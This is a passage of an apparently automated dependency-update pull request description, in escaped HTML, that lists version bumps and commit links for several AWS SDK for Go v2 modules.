href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.41.6...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.32.15 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.32.15...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/bedrockruntime` from 1.50.5 to 1.50.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b9b0c6553b80f99603b4f8356b88f5baf1328deb\"\u003e\u003ccode\u003eb9b0c65\u003c/code\u003e\u003c/a\u003e Release 2025-10-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e2bc8a0ec6f430876fc7de4432ea9cc89c9568f8\"\u003e\u003ccode\u003ee2bc8a0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8691ee380a96c49351e4b5ab8a70bc5d4d100724\"\u003e\u003ccode\u003e8691ee3\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/51e8a3fe032fc566d31b389f492ab58475a98398\"\u003e\u003ccode\u003e51e8a3f\u003c/code\u003e\u003c/a\u003e bump to go1.23 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3211\"\u003e#3211\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ad2d36cba7c5772b4e8e4caf96939dc41b95c65c\"\u003e\u003ccode\u003ead2d36c\u003c/code\u003e\u003c/a\u003e Release 2025-10-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/19a35d639f969ee328553e632e8cf8b83d324106\"\u003e\u003ccode\u003e19a35d6\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/35cb02fd50fb125601b9c3b33feb72f3a2bcaa56\"\u003e\u003ccode\u003e35cb02f\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f673a1b0a80e666c0128ec606ff053dace9771f1\"\u003e\u003ccode\u003ef673a1b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/48421fd812d8592a4eb2b32d11ae07e228969012\"\u003e\u003ccode\u003e48421fd\u003c/code\u003e\u003c/a\u003e Release 2025-10-14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fedcba778c21b451a91b4e4bcdd5d6c1554c6a5a\"\u003e\u003ccode\u003efedcba7\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ssm/v1.50.5...service/ecr/v1.50.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.57.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7c25c211744bdcff47a7203a7a894b1241f9da50\"\u003e\u003ccode\u003e7c25c21\u003c/code\u003e\u003c/a\u003e Release 2024-06-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b374423feaf0b04f01c7624b10915871e589b8a1\"\u003e\u003ccode\u003eb374423\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/923f54ea6016e1c70ad45ba0854e7361a72c3ba6\"\u003e\u003ccode\u003e923f54e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f3bdfcf190150f62a7a07a03bc32d9c58a68f2e\"\u003e\u003ccode\u003e5f3bdfc\u003c/code\u003e\u003c/a\u003e track changes for string_array endpoint parameters (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2699\"\u003e#2699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b4498c633741e24ff4930313610096601dc4036\"\u003e\u003ccode\u003e2b4498c\u003c/code\u003e\u003c/a\u003e Release 2024-06-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/332d372bb946f0d50cae58f9401b9c1244e4b818\"\u003e\u003ccode\u003e332d372\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9397b8d8c05eb1528910ba81881797e7c0e53d17\"\u003e\u003ccode\u003e9397b8d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/674e1e4412ce44325902125c935ce124d0bfaf4f\"\u003e\u003ccode\u003e674e1e4\u003c/code\u003e\u003c/a\u003e Release 2024-06-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/406eeb4367bab3ac49b75fbd2d842186e961f4f0\"\u003e\u003ccode\u003e406eeb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/17bd894f3c3842d21d5963bc23213397557c3105\"\u003e\u003ccode\u003e17bd894\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/s3/v1.57.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs` from 1.51.0 to 1.73.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8fac7d48b4707a8fdd9cb23b34b928fc83e38777\"\u003e\u003ccode\u003e8fac7d4\u003c/code\u003e\u003c/a\u003e Release 2025-01-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9eff8acbf1cc8bb294171b969a8e2803bf235a07\"\u003e\u003ccode\u003e9eff8ac\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f47aa72637a4492512213811a314dda0b9c9a189\"\u003e\u003ccode\u003ef47aa72\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5934dd36b8ecbc42a321216e8da721e1258ae8a8\"\u003e\u003ccode\u003e5934dd3\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6636822440828c3eebaacfe9a182c9eb47895236\"\u003e\u003ccode\u003e6636822\u003c/code\u003e\u003c/a\u003e feat: flexible checksum updates (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2808\"\u003e#2808\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4ffbb7cbe6bfeebb50a773d45df57d3fd126cafb\"\u003e\u003ccode\u003e4ffbb7c\u003c/code\u003e\u003c/a\u003e Release 2025-01-14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2f70ff490c3474a59ca29dc2661ec5e4f13ec2f7\"\u003e\u003ccode\u003e2f70ff4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/434159f5c088eb7b484fea9179d6c5e6302e4610\"\u003e\u003ccode\u003e434159f\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a80fac9aee1efaac1d16f4005ccc93fed22c62c3\"\u003e\u003ccode\u003ea80fac9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44e779abca3ec6dfdc9415ced6af0aa684149bd1\"\u003e\u003ccode\u003e44e779a\u003c/code\u003e\u003c/a\u003e fix several waiter issues (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2953\"\u003e#2953\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.51.0...service/s3/v1.73.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.296.0 to 1.300.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dc2d13fa6f1db25f1c6d804567e1ecfcdff4f040\"\u003e\u003ccode\u003edc2d13f\u003c/code\u003e\u003c/a\u003e Release 2026-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/da4bcffa913dc4ba46e1ce10a6268bf075547a8d\"\u003e\u003ccode\u003eda4bcff\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a8b1180254cba3e23aa6baece26783395e884d81\"\u003e\u003ccode\u003ea8b1180\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7078055860a55b00b76d6405baaa3f4f27094a5\"\u003e\u003ccode\u003ea707805\u003c/code\u003e\u003c/a\u003e Release 2026-05-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/657bacf7f10746f434840a3d734e9e2895a84098\"\u003e\u003ccode\u003e657bacf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/29b6d377e2ecb35afe2b2f81914f62f33b6e8482\"\u003e\u003ccode\u003e29b6d37\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2328c4178cc3a828ada0e914dcba16b23eb548c6\"\u003e\u003ccode\u003e2328c41\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/83b34eacc84bae944779445d005bd25eb111fc25\"\u003e\u003ccode\u003e83b34ea\u003c/code\u003e\u003c/a\u003e Release 2026-04-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6eecf01d048da426be6809b82ee740e0bf21858\"\u003e\u003ccode\u003ef6eecf0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3cca141ddf7d9e6ad796eec7c3395f0f0714bba8\"\u003e\u003ccode\u003e3cca141\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.296.0...service/ec2/v1.300.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/oam/v1.23.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 1.31.12\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4f599a5905bdfa3f6aa482e1e7bb98f7b3f9ec03\"\u003e\u003ccode\u003e4f599a5\u003c/code\u003e\u003c/a\u003e Release 2025-09-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c32a7a8084b2d86eeda99f184e75fdca0b33e5a9\"\u003e\u003ccode\u003ec32a7a8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18a065d1689d43c994da970a8750d43844c79896\"\u003e\u003ccode\u003e18a065d\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/af534aa0fb522eb683d484d281d2a017be8a006c\"\u003e\u003ccode\u003eaf534aa\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.97.1 to 1.100.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca 